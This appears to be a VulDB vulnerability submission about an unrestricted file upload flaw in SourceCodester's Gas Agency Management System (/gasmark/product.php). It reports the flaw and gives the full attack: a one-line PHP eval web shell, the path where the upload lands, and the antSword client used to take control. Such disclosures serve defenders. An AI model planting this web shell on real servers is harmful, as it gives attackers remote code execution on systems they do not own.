| 제목 | sourcecodester Gas Agency Management System /gasmark/product.php exists unrestricted upload |
|---|
| 설명 | File uploading is not filtered, and uploading a sentence is caused by a Trojan horse getshell
upload shell like this
```php
<?php @eval($_POST['shell']);?>
```
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/oneWorld.png
Then we check it
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/Check.png
then we can see it in /gasmark/assets/myimages/oneWord.php
Use antSword to getshell
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/getShell.png
The source code website is https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |
|---|
| 사용자 | Drunkbaby (UID 30821) |
|---|
| 제출 | 2022. 08. 11. PM 12:52 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 08. 11. PM 01:44 (52 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 206173 [SourceCodester Gas Agency Management System oneWord.php shell 권한 상승] |
|---|
| 포인트들 | 20 |
|---|